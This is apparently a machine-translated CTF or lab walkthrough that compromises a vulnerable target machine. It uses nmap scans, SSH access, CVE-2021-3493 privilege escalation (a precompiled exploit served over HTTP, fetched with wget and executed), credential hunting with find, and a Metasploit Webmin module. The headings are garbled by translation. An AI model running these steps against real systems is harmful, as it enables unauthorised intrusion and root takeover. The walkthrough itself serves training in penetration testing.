Catalog

One 、nmap Scan surviving hosts

Two 、 Service version detection

3、 ... and 、 information gathering

Four 、 Internal system information leakage

  5、 ... and 、ssh Connect

  6、 ... and 、0day Raise the right

1. Upload, compile and execute

7、 ... and 、 Normal right raising

1. firefox

2. lookup cubes Related documents

3.su become cubes

 4.find Search for

5. Sign in webmin backstage

8、 ... and 、msf

One 、nmap Scan surviving hosts

1. Half open scan

nmap -sS ip

2. Full open scan

nmap -sT ip

3. be based on ping Scan

nmap -sP ip

4. be based on arp Scan

nmap -PR ip

5. nothing ping scanning

nmap -PN 192.168.152.130

Two 、 Service version detection

22,80 Or two commonly used services ,10000 The port is open webmin

Webmin Is the most powerful based on Web Of Unix System management tools . Administrator access through browser Webmin And complete the corresponding management actions .Webmin Support the vast majority of Unix System , These systems are in addition to various versions of linux In addition to ：AIX、HPUX、Solaris、Unixware、Irix and FreeBSD etc. .

3、 ... and 、 information gathering

 80 The port has no useful information for us to break through the boundary

But in 10000 We found a port webmin Login box for

1.webmin Login box for

2.robots.txt file

 3. Trying to decrypt

we scan php codes with rips

4.rips

 RIPS Is a good static source code analysis tool , Mainly used for excavation PHP Program vulnerabilities . And it's a web Interface , visit rips Start using . Try to visit .

In the end in 80 We see this under the port rips

Four 、 Internal system information leakage

  5、 ... and 、ssh Connect

Try logging in here webmin The background result is not good . Try to make use of ssh Login successful ,

  6、 ... and 、0day Raise the right

Because after the release of this target plane ,unbuntu There is a loophole for raising rights . So we can use it directly .

Hole number ：cve-2021-3493

1. Upload, compile and execute

The target host has no compilation environment , Precompile

gcc exploit.c -o exp

Turn on http service

python3 -m http.server 80

download

wget http://192.168.0.106/exp

Give power

chmod 777 exp

perform

./exp

7、 ... and 、 Normal right raising

1. firefox

I saw another Firefox browser , It's no use fiddling .

2. lookup cubes Related documents

find / -user cubes -type f -exec ls -al {} \;  2>/dev/null

This order is {} It is used to receive results

This is used to escape ; Of

  After searching , Got a password , Guess it is cubes Of

3.su become cubes

 4.find Search for

Find and cubes dependent , And filter out useless

 find / -user cubes -type f -exec ls -al {} \;  2>/dev/null |grep -v "proc"

In the log file, we found admin Account and password

5. Sign in webmin backstage

Because we got the account and password of the administrator , Again because webmin Is to control the linux Terminal web‘ application ’, So I have got the highest permission after logging in .

8、 ... and 、msf

Just to get familiar with the usage , because msf Of rce The module also needs an account and password , But with the account and password, we can get the administrator permission directly

msfconsole

search webmin

use 2

show options

Set all parameters

Here also need to set

set ssl true